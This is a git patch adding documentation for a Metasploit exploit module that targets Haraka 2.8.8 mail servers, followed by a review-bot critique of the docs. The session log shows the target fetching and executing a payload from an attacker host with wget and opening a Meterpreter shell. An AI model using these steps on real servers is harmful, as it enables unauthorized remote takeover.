From 651f1a0870d2e36bd8a4b4b2e52d4e826f068a78 Mon Sep 17 00:00:00 2001 From: "Mark Bergman (aka xychix)" Date: Fri, 27 Jan 2017 10:31:12 +0100 Subject: [PATCH] Create harakiri.md --- .../modules/exploit/linux/smtp/harakiri.md | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 documentation/modules/exploit/linux/smtp/harakiri.md diff --git a/documentation/modules/exploit/linux/smtp/harakiri.md b/documentation/modules/exploit/linux/smtp/harakiri.md new file mode 100644 index 0000000000..10b8e9a547 --- /dev/null +++ b/documentation/modules/exploit/linux/smtp/harakiri.md 
@@ -0,0 +1,127 @@ +## Vulnerable Application + + You can get the vulnerable Haraka installes by running this script: + ```` + #Install a clean server (for example on Digital Ocean) + #I picked the smallest Ubuntu 16.04.1 LTS for this guide. + #I needed to enable swap on that installation + fallocate -l 4G /swapfile + chmod 600 /swapfile + mkswap /swapfile + swapon /swapfile + swapon -s + + #install nodejs and npm: Note I have no clue what I'm doing here but it works! + apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y + wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz + tar xvzf v2.8.8.tar.gz + cd Haraka-2.8.8/ + npm install -g npm + ln -s /usr/bin/nodejs /usr/bin/node + npm install -g + + #Haraka setup + haraka -i /root/haraka + + cat << EOF > /root/haraka/config/plugins + access + rcpt_to.in_host_list + data.headers + attachment + test_queue + max_unrecognized_commands + EOF + + cat << EOF >> /root/haraka/config/host_list + haraka.test + EOF + + # Launch haraka as root + haraka -c /root/haraka/ + ```` + +## Verification Steps + + Example steps in this format: + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/linux/smtp/harakiri``` + 4. Do: ```set RHOST ``` + 5. Do: ```expoit``` + 6. You should get a shell. If not play with MAILFROM MAILTO options. + +## Options + + **EHLO** + + String used in the SMTP EHLO command + + **MAILTO** + + String used in the SMTP MAILTO command + + **MAILFROM** + + String used in the SMTP FROM command + + **DOWNHOST** + + Download server for payload (if empty SRVHOST will be used) + + **DOWNFILE** + + File to download from DOWNHOST (if empty a random name will be generated and used) + +## Scenarios + + Specific demo of using the module that might be useful in a real world scenario. 
+ + ``` + #msfconsole + + =[ metasploit v4.13.15-dev ] + + -- --=[ 1614 exploits - 915 auxiliary - 279 post ] + + -- --=[ 471 payloads - 39 encoders - 9 nops ] + + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] + + msf > use exploit/linux/smtp/harakiri + msf exploit(harakiri) > set RHOST 257.6.26.2 + RHOST => 257.6.26.2 + msf exploit(harakiri) > exploit + [*] Exploit running as background job. + + [*] Started reverse TCP handler on 6.6.6.6:4444 + [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ... + [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw + [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw + msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw + [*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello burn.outflank.nl [6.6.6.6], Haraka is at your service. + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME + [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0 + [*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender OK + [*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient OK + [*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day + [*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server... + [*] Transmitting intermediate stager for over-sized stage...(105 bytes) + [*] Sending stage (1495599 bytes) to 257.6.26.2 + [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100 + + msf exploit(harakiri) > + [*] 257.6.26.2:25 - Server stopped. 
+ + msf exploit(harakiri) > + ``` + + For example: + + To do this specific thing, here's how you do it: + + ``` + msf > use exploit/linux/smtp/harakiri + msf exploit(harakiri) > set RHOST 257.6.26.2 + RHOST => 257.6.26.2 + msf exploit(harakiri) > exploit + ```
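Review bot: The Options section misdescribes the SMTP commands: there is no SMTP MAILTO command, and this hunk's own session log shows the recipient step as `RCPT: 250 recipient OK`, so MAILTO should read "String used in the SMTP RCPT TO command" and MAILFROM "String used in the SMTP MAIL FROM command". The Verification Steps still carry the template lead-in ("Example steps in this format:"), step 4 lacks a placeholder (`set RHOST <target IP>`), and step 5 misspells the command as ```expoit```. In the Scenarios section the leftover template sentences ("Specific demo of using the module that might be useful in a real world scenario.", "For example:", "To do this specific thing, here's how you do it:") and the second, truncated transcript duplicate the full transcript above them and should be dropped. The install script fence opens and closes with four backticks while the rest of the file uses three, and "installes" should be "installs". The Vulnerable Application section gives only an install script: it should state which Haraka versions are affected (the script installs v2.8.8), which of the enabled plugins the module relies on (the config enables `attachment` among others) and link the upstream advisory, so a reader knows what is being reproduced rather than only how to build it. The example addresses `257.6.26.2` and `6.6.6.6` are not usable documentation addresses (257 is not a valid octet); the RFC 5737 ranges such as 192.0.2.0/24 are the conventional choice.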